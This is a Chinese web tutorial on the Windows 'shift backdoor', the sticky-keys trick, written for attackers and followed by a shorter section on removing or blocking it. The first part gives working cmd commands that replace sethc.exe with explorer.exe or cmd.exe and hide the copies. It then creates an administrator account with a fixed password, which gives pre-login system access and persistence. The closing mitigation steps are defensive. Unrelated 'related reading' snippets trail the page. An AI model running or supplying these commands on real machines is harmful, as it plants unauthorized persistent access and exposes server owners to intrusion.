shift后门
一、什么是shift后门?
shift后门是黑客希望以后方便进入服务器而在没有密码的情况下为进入服务器系统而设置的一个后门。
其操作就是在不知道管理员密码的情况下,连续按5次shift键来启动粘滞键,已进入服务器的系统程序管理器。
二、shift后门的制作?
其制作有很多种,下面介绍一种常用的,可以明白其原理自己扩展:
在cmd窗口,敲打命令如下:
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h
用copy命令将explorer.exe复制为setch.exe,这样在登陆界面下连续按5次shift就可以调出程序管理系统了,就获取了系统权限。
(也可以将explorer.exe 改为cmd.exe,这样子这样在登陆界面下连续按5次shift就可以调出cmd命令了,就获取了shell权限。)
使用命令:
net user admin 123456 /add && net localgroup adMinistrators admin /add
执行上面的命令,便可以创建一个叫admin的用户,密码为123456.
三、shift后门的禁止?
两种方法:
第一种:直接删除C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache这两个目录的sethc.exe文件,(注意:dllcache这个目录是隐藏的,要在文件夹选项里选择"显示所有文件和文件夹"把"隐藏受系统保护的操作系统文件"的选择取消才能看得到).这种方法不能完全解除,当服务器重启后,还是会出现后门。
第二种(建议使用这种方法):使用权限来约束这两个文件C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache这两个目录的sethc.exe文件,(注意:dllcache这个目录是隐藏的,要在文件夹选项里选择"显示所有文件和文件夹"把"隐藏受系统保护的操作系统文件"的选择取消才能看得到). 在权限里设置为所有用户(Everyone)禁止运行。具体操作步骤如下:
1.找到C:\WINDOWS\system32目录下的sethc.exe文件,打开属性:
点击”高级“,去掉“允许父项的继承权限传播到该对象和所有子对象”的勾。
点击”添加“,在出现的选择用户和组中点击”立即查找“,在搜索结果中找到”Everoy“用户,并确定:
点击确定:
继续确定,将”Everoy“用户的权限设置为全部拒绝:
这样就禁止了安装和在此访问。当再次安装和访问时,就会出现拒绝访问:
相关阅读
说明:1、本软件用于修复管家婆辉煌版提示:嘚瑟反馈率F 请联系任我行软件股份公司或当地合法代理。2、目前支持版本:辉煌II+10.x,其它
1. 原理 用meanshift做图像平滑和分割,其实是一回事。其本质是经过迭代,将收敛点的像素值代替原来的像素值,从而去除了局部相似的纹
这几天学习《学习OpenCV》中的第十章运动跟踪,里面讲到了meanshift算法,根据书上所讲实在难以理解,meanshift在运动跟踪这个过程中到
0x00:介绍 首先介绍一下粘滞键,粘滞键很多人都知道,windows 系统下连续按 5 次 shift 可调出其程序,但使用可能有一部分人不太了解,毕
使用matlab进行傅里叶变换 模拟信号进行奈奎斯特采样后成为离散的数字信号,时域分析不太方便,通常要进行频域变换更好的分析信号,mat